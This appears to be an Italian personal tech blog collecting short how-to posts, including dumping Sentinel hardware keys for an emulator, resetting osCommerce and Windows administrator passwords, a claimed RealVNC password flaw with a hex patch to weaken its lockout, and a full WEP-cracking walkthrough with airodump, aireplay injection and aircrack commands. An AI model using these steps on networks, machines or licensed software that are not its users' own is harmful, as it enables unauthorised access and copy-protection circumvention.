MAXBLOG

 

Attualmente molte ditte ricorrono alle costose Sentinel Hardward Key per la protezione del software .

Qualora sia necessario installare il programma, regolarmente acquistato, su altre postazioni o se si vuole evitare di portarsi in giro le preziose chiavi, è possibile utilizzare programmi emulatori che consentono il normale funzionamento del software anche senza l’impiego delle chiavi Sentinel.

Il programma che ho utilizzato per l’emulazione è Sentinel Emulator 2007 che, con qualche accorgimento, gira efficacemente anche su Windows Vista.

Il pacchetto zippato, facilmente reperibile sul web, contiene i seguenti programmi:

- EDGE

- Sentinel versione 7.3.0

- SSDCleanup

- Emulator

- Varie guide.

Naturalmente, affinché l’emulatore funzioni, è  necessario avere una Sentinel Key originale.

La prima cosa da fare è lanciare l’applicazione Sentinel73.exe per installare i driver della chiave.

Una volta installati, inserite la chiave, attendete l’installazione dell’Hardware e successivamente avviate il programma EDGE.

IL programma EDGE ha la funzione di copiare i dati contenuti nella memoria della chiave esportandoli in un file con estensione DNG, una volta inserita la cartella di destinazione del file e definito il nome (da Browse), basta premere il pulsante Dump&Solve ed attendere qualche minuto, una volta creato il Dump File, è possibile rimuovere la chiave.

 

Per far funzionare il programma sotto Vista, basta accedere al pannello delle proprietà del programma Emulator ed attivare la modalità di compatibilità per Windows XP. La versione Emulator 2010, compatibile con Vista, non accetta il file Dump precedentemente creato.

 

A questo punto lanciate  il programma Emulator 2007 e verificate se i Driver sono stati correttamente installati:

 

Avviate l’emulatore (Start Service), caricate dal pannello Dongles il file Dump con estensione DNG precedentemente creato.

 

Se tutto è andato a buon fine avrete una schermata come la seguente:

 

 

Durante l’installazione di WordPress viene attribuita di default la username “admin” a tutti gli amministratori. Tale impostazione non è successivamente modificabile dal pannello di controllo degli utenti.

Avere il nome utente “admin” uguale ad altre migliaia di fortunati possessori di un blog su piattaforma WP agevola di non poco il lavoro di eventuali hackers intenzionati a penetrare il vostro sito. E’ pertanto necessario ovviare appena possibile a questo problema.

Per cambiare la username seguite le seguenti istruzioni:

1) Loggatevi sul vostro phpMyAdmin.

2) Eseguite il Backup del DataBase di WordPress (Esporta).

3) Selezionate la tabella “_user” e poi cliccate su mostra:

4) Selezionate il record relativo l’amministratore ed editatelo (Modifica.)

5) Cambiate, a vostra scelta, il valore della username:

6) Salvate i cambiamenti.

Per finire, per rendere la vostra password veramente “forte”, inseriteci almeno un carattere del tipo !”£$%&/().

 

 

Per tutti gli appassionati dei penetrations test è disponibile la versione 3 di Back|Track, avevo già provato la versione beta 3 con ottimi risultati.

Se come me avete dimenticato la password di amministratore per accedere al vostro sito OsCommerce, non vi preoccupate, la procedura per riottenere l’accesso è molto semplice!

1) Entrate nel vostro database Mysql sul quale poggia il sito

2) Selezionate il database

3) Visualizzate la tabella di amministratore (mostra)

4) Segnatevi la vostra User_name (nel mio esempio Gianluca) e, al posto della vecchia user_password inserite i seguenti caratteri:

1060bdf4e47bc8b4ab3fb0cfea9ef70b:77

o, per le versioni più recenti:

68c79e6701157492d5906381c3d26b77:72

che sostituiscono la vecchia password con la seguente: admin

5) Adesso vi potete loggare nuovamente usando “admin” come password!

Si sente sempre più spesso parlare di “server spia”, ovvero server creati dalle lobbi multinazionali che, nel tentativo di  difendersi dalla pirateria, registrano e monitorizzano i nostri dati condivisi su emule, conservandosi probabilmente anche il nostro indirizzo I.P.

Da quello che si legge sulla rete sembra che tale attività abbia, almeno per il momento, solo una funzione statistica ma nulla vieta per il futuro di usare le nostre firme digitali (IP) per rintracciarci.

Ormai questi server stanno affinando i loro metodi di adescamento, per esempio alterando il numero degli “user connessi” in modo tale da indurre i più golosi a connettersi al server più gettonato.

I metodi di protezione sono semplici e ben illustrati su eMuleSecurity, primo tra tutti è quello di utilizzare server.met per aggiornare la lista solo con server verificati:

su Emule andate nella finestra server ed inserire in “Aggiorna lista server.met da URL” il seguente indirizzo http://www.gruk.org/server.met.gz

su Amule andate su preferenze/server e, su ” Aggiorna lista server all’avvio“,  cliccate il pulsante “lista“  ed inserite il seguente URL http://www.gruk.org/server.met.g

Poi dobbiamo evitare che vengano automaticamente aggiunti server spia all’elenco, pertanto sia su Emule che su Amule, andate nel pannello “Preferenze” e dalla scheda “Server” disabilitate:

• Aggiorna lista server quando ci si connette ad un server
• Aggiorna lista server quando un client si connette

 

 

Facendo vari tentativi per verificare la sicurezza di RealVNC, mi sono accordo di una falla nel sistema di autenticazione del Server (VNC Password Authentication).
Premesso  che il sistema ha una protezione contro  il Dictionary Attacks con il quale, a seguito di 5 tentavi di connessione falliti, blocca l’autenticazione a l’accesso al server per circa 10 secondi (parametro variabile modificando il file .exe con un HEX editor sostituendo “d1e18948″ con “90908948″) ed il Viewer Client visualizza la seguente frase:

“too many security failures”.

Questo in effetti non è un problema in quanto, se non si ha troppa fretta,  si può impostare un ritardo tra un attacco ed il successivo.

Imposto una semplice password numerica, ad esempio 1, creo un dizionario  con   numeri da 2  a 1000 (il numero 1 l’ho inserito verso il 300) e da terminale lancio l’attacco (sempre sulla mia rete di casa), dopo pochi secondi trovo  la password : Found, password:10!

Come “password: 10″?

Approfondisco la problematica e verifico che RealVNC si limita a controllare se il campo password, composta in questo caso da solo un carattere,  contiene il  numero 1, senza preoccuparsi di quello che segue, mi spiego meglio:

se la password è “1″, per autenticarsi vanno bene anche i seguenti numeri:

11,  111, 1111, 111111, 10, 100, 1001, 111101101010101!

pertanto potete immaginare che teoricamente, le password di accesso che consentono l’autenticazione sono infinite!!!!!!

Come contributo invierò questa segnalazione a www.realvnc.com

 

…. aggiornamento

Provo a contattare RealVNC per inviare la segnalazione, ma scopro che avendo scaricato la servione Free, non sono degno di contattarli, solo i clienti  Personal ed Interprice, che hanno pagato per avere un programma con un Bug possono accedere al servizio di assistenza.

Complimenti, mi ricorda le versione RealVNC 3.3.7 e 4.1.1  dove, se qualcuno ancora non lo sa, con il giusto Exploit chiunque può bypassare la password di accesso:

 

 

 e vi assicuro che funziona.

Molti insistono ad impiegare, o meglio a provare ad utilizzare Kismac con la scheda Airport del Macbook con la speranza di violare una rete wireless, attualmente è impossibile. L’unica cosa che possono fare è abilitare i drivers per il “passive mode” (vedete l’articolo relativo) ma niente di più.

Con questo non voglio dire che con la scheda Airport non si può fare l’injection, è solo che per farlo usano la piattaforma sbagliata.

Difatti per abilitare tale funzione occorre solo il giusto programma:

Backtrack

una distribuzione live di Linux (circa 700 Mb) con vari utili programmi tra i quali Aircrack.

La procedura è molto semplice:

Andate sul sito http://www.remote-exploit.org/backtrack.html e scaricate l’immagine iso .

Una volta scaricata l’immagine masterizzatela su un CD (consiglio di farlo con Utility Disco/Masterizza senza complicarvi la vita con altri programmi).

Creato il cd lasciatelo inserito nel computer ed riavviate il MAC tenendo premuto il tasto C in modo tale da avviare da CD-rom, partirà l’installazione.

Quando vi verrà chiesto la modalità grafica vi consiglio di scegliere KDE.

Una volta installato aprite il pannello All Applications e sfogliate le seguenti cartelle:

Backtrack

Radio Network Analysis

80211

Cracking

Aircrack

Dalla cartella Aircrack avviate tre programmi in tre diverse Shell:

Air Replay

Aiodump

Aircrack

La procedura per cracking è stata già esaurientemente descritta nell’articolo relativo ad Aircrack-ng ma per completezza sintetizzo come procedere.

Il test è stato eseguito sulla mia rete Wireless per l’occasione protetta con chiave WEP.

Dalla Shell Airodump digitate:

iwconfig

e scoprite la sigla attribuita alla vostra scheda wifi:

lo no wileress extensions

eth0 no wileress extensions

wifi0 no wireless exensions

ath0 IEEE 802.11g ESSID:”" Nikname:”"

Mode: Managed Channel:0 Access Point Not-Associated

Bit Rate:0 kb/s Tx-Power:14 dBm Sensitivity:1/1

Retry:off RTS thr:off Fragment thr:off

Encription key ff Power Management:off

digitate

airmon-ng start wifi0:

interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

che abilita ath1 (la mia scheda) in monitor mode

poi:

airodump-ng ath1

segnatevi il canale CH e fermate l’applicazione:

ctrl C

digitate:

airodump-ng -c 1 -w pippo ath1

Airodump inizierà a lavorare e salverà di dati catturati nel file pippo-01.cap

Adesso per stimolare la produzione di IVs procedete con l’injection:

per testare se la scheda funziona:

aireplay-ng -9 ath1

se è tutto ok apparirà:

Trying broadcast probe requests….

Found 1 AP

poi procederò a pingare gli Access Point disponibili:

Trying directed probe requests

00:19:xx:xx:xx:xx – channel 1 – ‘Alice-xxxxxx’

Ping (min/avg/max): 3.969ms/104.333ms/171.666 ms Power 78.79

30/30: 100%

Injection is working!

aireplay-ng -3 -b (indirizzo MAC del A.P.) -d ff:ff:ff:ff:ff:ff -h (indirzzo MAC del T.C.) ath1

ed ecco partire l’injection dalla nostra Airport.

Dalla Shell di Airodump tenete sotto controllo i paccketti IVs catturati e, quanto arrivate ad un numero discreto (a me ne sono bastati 34000), procedete con il cracking.

Dalla Shell di Aircrack digitate

aircrack-ng -a 1 pippo-01.cap

se i pacchetti catturati sono sufficienti, in pocki secondi otterrete la chiave.

Come già detto per i dettagli e le varie modalità di attacco leggete l’articolo relativo a Aircrack ng.

Buon lavoro

 

Per criptare dati sul proprio Mac suggerisco di sfruttare le potenzialità della piattaforma OS. Difatti una valida alternativa a FileVault (che protegge, criptandola, la cartella inizio) è utlizzare Utility Disco per creare una immagine protetta a 128 o 256 Bit!

Dalla cartella Utility lanciate Utility Disco

e selezionate Nuova Immagine

decidete il nome, la posizione e la dimensione dell’immagine, poi selezionate il tipo di Criptatura desiderata

consiglio 256-bit AES, con un core2 non si riscontrano problemi di lentezza

poi scegliete la password da impegare, naturalmente facile da ricordare (la finestra vi indica anche la robustezza della stessa)

Il programma crea un file xxxxxx.dmg criptato.

Per accedere ai vostri dati inserite la votra password

e qualora corretta accedete al vostro disco virtuale. Cosiglio di non salvarla nel portachiavi.

Per cripatare nuovamente basta espellere il disco

 

Per varie ragioni può capitare di dover resettare la Password di Windows per accedere al computer. Un validissimo programma per questo scopo è:

Offline NT Password & Registry Editor

Il programma da me utlizzato è contenuto nelle suite di Ultimate Boot CB (UBCD) V4.1.1

Start

Inserite il CD/DVD di UBCD ed avviate il computer (impostare avvio da CD-rom)

Nella schermata delle opzioni scegliere

Filesystem Tools

NTFS Tools

Offline NT Password & Registry Editor 070409

Step 1

Una volta individuate le partizioni vi sarà chiesto di sceglierne una:

========================================

¤ Step ONE: Select disk where the Windows installation is

========================================

Disks:

Disk /dev/sda: 42.9 GB, 42949672960 bytes

Candidate Windows partitions found:

1 : /dev/sda1 40958MB BOOT

Here it has found one disk with one partition

Please select partition by number or

q = quit

d = automatically start disk drivers

m = manually select disk drivers to load

f = fetch additional drivers from floppy / usb

a = show all partitions found

l = show propbable Windows (NTFS) partitions only

Select: [1]

Premete Enter e proseguite (selezione 1 predefinita)

Selected 1

Mounting from /dev/sda1, with filesystem type NTFS

Step 2

Indirizzatelo sulla cartella del registro dove applicare il Path

=========================================

¤ Step TWO: Select PATH and registry files

========================================

What is the path to the registry directory? (relative to windows disk)

[WINDOWS/system32/config] :

Se avete installato WINDOWS ME/XP premete Enter

-rw——- 2 0 0 262144 Feb 28 2007 BCD-Template

-rw——- 2 0 0 6815744 Sep 23 12:33 COMPONENTS

-rw——- 1 0 0 262144 Sep 23 12:33 DEFAULT

drwx—— 1 0 0 0 Nov 2 2006 Journal

drwx—— 1 0 0 8192 Sep 23 12:33 RegBack

-rw——- 1 0 0 524288 Sep 23 12:33 SAM

-rw——- 1 0 0 262144 Sep 23 12:33 SECURITY

-rw——- 1 0 0 15728640 Sep 23 12:33 SOFTWARE

-rw——- 1 0 0 9175040 Sep 23 12:33 SYSTEM

drwx—— 1 0 0 4096 Nov 2 2006 TxR

drwx—— 1 0 0 4096 Feb 27 2007 systemprofile

Select which part of registry to load, use predefined choices

or list the files with space as delimiter

1 – Password reset [sam system security]

2 – RecoveryConsole parameters [software]

q – quit – return to previous

[1] :

Premete Enter (opzione 1)

======== chntpw Main Interactive Menu ========

Loaded hives:

1 – Edit user data and passwords

2 – Syskey status & change

3 – RecoveryConsole settings

– - -

9 – Registry editor, now with full write support!

q – Quit (you will be asked if there is something to save)

What to do? [1] ->

Premete Enter (opzione 1)

==========================================

¤ Step THREE: Password or registry edit

=========================================

A questo punto visualizzerete tutti gli utenti della macchina, naturalmente agiremo nel nostro caso sull’account dell’

 

amministratore

RID: 01f4, Username: <Administrator> *disabled or locked*

RID: 01f4, Username: <Guest> *disabled or locked*

Select: ! – quit, . – list users, 0x – User with RID (hex)

or simply enter the username to change: [Administrator]

Premiamo Enter (Amministrator)

Account bits: 0×0214 =

[ ] Disabled | [ ] Homedir req. | [X] Passwd not req. |

[ ] Temp. duplicate | [X] Normal account | [ ] NMS account |

[ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act |

[X] Pwd don’t expir | [ ] Auto lockout | [ ] (unknown 0×08) |

[ ] (unknown 0×10) | [ ] (unknown 0×20) | [ ] (unknown 0×40) |

Failed login count: 0, while max tries is: 0

Total login count: 3

Adesso resettiamo la password di Amministratore (opzione consigliata)

*= blank the password

(blannk often best! Especially on Windows Vista.)

Enter nothing to leave it unchanget

Please enter new password:

Digitare * (se la tastiera non è riconosciuta provare varie combinazioni, nel mio caso (shift8), confermate “y”

 

nel passo successivo

Do you really wish to change it? (y/n) [n] y

Changed!

Poi uscite

Select:! –

 

Come accennavo nell’articolo relativo la sicurezza wireless, per la creazione delle password consiglio un programma dedicato che le generi modo randomico.Naturalmente puà accadere di perderle e allora come facciamo?Se non avete formattato l’hard disk in pochi minuti possiamo recuperale.Per far questo installiamo il programma Cain & Abel.Se durante l’installazione il vostro antivirus vi segnala qualcosa, state tranquilli e procedete, se vi cancella un file, disabilitatelo e reinstallate.Adesso avviate il programma e vi troverete di default nella sezione “Decoders”, cliccate su Wireless Password” e spostatevi nella tabella adiacente, cliccate il punsante “+” (quello blu) ed ecco apparire le vostre password smarrite.